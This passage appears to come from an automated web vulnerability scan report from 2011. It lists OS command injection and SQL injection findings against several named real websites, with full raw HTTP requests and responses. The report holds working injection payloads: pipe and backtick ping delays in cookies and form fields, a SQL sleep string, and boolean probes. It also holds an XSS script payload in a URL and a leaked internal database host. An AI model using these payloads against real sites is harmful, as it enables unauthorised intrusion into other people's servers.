33.93. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico

33.94. http://www2.sesamestats.com/paneltracking.aspx

34. Content type is not specified

34.1. http://www.expedia.com/static/default/default/images/close.gif

34.2. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png

34.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

34.4. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

34.5. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png

34.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif

34.7. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

34.8. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png

34.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif

34.10. http://www.socialfollow.com/button/image/

34.11. http://www.socialfollow.com/button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E


1. OS command injection  next
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:

1.1. https://secure.trust-guard.com/ [__utmb cookie]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmb cookie. The application took 50222 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384|ping%20-n%2020%20127.0.0.1||x

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:03:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
1.2. https://secure.trust-guard.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmc cookie. The application took 25682 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874|ping%20-n%2020%20127.0.0.1||x; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the txtEmail parameter. The application took 50190 milliseconds to respond to the request, compared with 25263 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

POST /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
Origin: https://secure.trust-guard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4
Content-Length: 66

txtEmail=-111%27+OR+SLEEP%2825%29%3D0+LIMIT+1--++|ping%20-n%2020%20127.0.0.1||x&btnSubmit=Submit

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:20:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.4. https://secure.trust-guard.com/index.php [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utma cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utma cookie. The application took 50194 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3`ping%20-c%2020%20127.0.0.1`; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:30:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
1.5. https://secure.trust-guard.com/index.php [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmz cookie. The application took 25161 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|ping%20-n%2020%20127.0.0.1||x; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:12:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The BIGipServerH1-HUNTON-A0910-80 cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the BIGipServerH1-HUNTON-A0910-80 cookie. The application took 47061 milliseconds to respond to the request, compared with 8762 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000|ping%20-c%2020%20127.0.0.1||x; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:17:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
2. SQL injection  previous  next
There are 77 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.allatsea.net
Path:   /www/delivery/spc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d1--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:21 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:21 GMT; path=/
Content-Size: 6150
Content-Length: 6150
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=f67466d6e0__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_f67466d6e0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D1--+atta&amp;cb=f67466d6e0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_2'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_2'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_2'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_2'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_2'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_2'] += "google_ad_width = 125;\n";
OA_output['zone_22_2'] += "google_ad_height = 125;\n";
OA_output['zone_22_2'] += "//-->\n";
OA_output['zone_22_2'] += "<"+"/script>\n";
OA_output['zone_22_2'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_2'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_2'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_f641e7f716\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatse
...[SNIP]...

Request 2

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d2--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:22 GMT; path=/
Content-Size: 6788
Content-Length: 6788
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_1'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_1'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_1'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_1'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_1'] += "google_ad_width = 125;\n";
OA_output['zone_22_1'] += "google_ad_height = 125;\n";
OA_output['zone_22_1'] += "//-->\n";
OA_output['zone_22_1'] += "<"+"/script>\n";
OA_output['zone_22_1'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_1'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_4f7d84567b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D2--+atta&amp;cb=4f7d84567b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=4dd54d6c2a__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_4dd54d6c2a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatse
...[SNIP]...
2.2. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ac parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /appshandler.php?ac=1'&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...
2.3. http://cdn-forums.scout.com/adfeed.ashx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adfeed.ashx'?s=143&format=json&callback=$.showAd.cacheAdCodes HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-forums.scout.com

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: MBRD25
Vary: Accept-Encoding
Date: Fri, 06 May 2011 19:58:06 GMT
Connection: close
Akamai: True

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /adfeed.ashx''?s=143&format=json&callback=$.showAd.cacheAdCodes HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-forums.scout.com

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
Server: Mbrd6
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: text/html
Content-Length: 12238
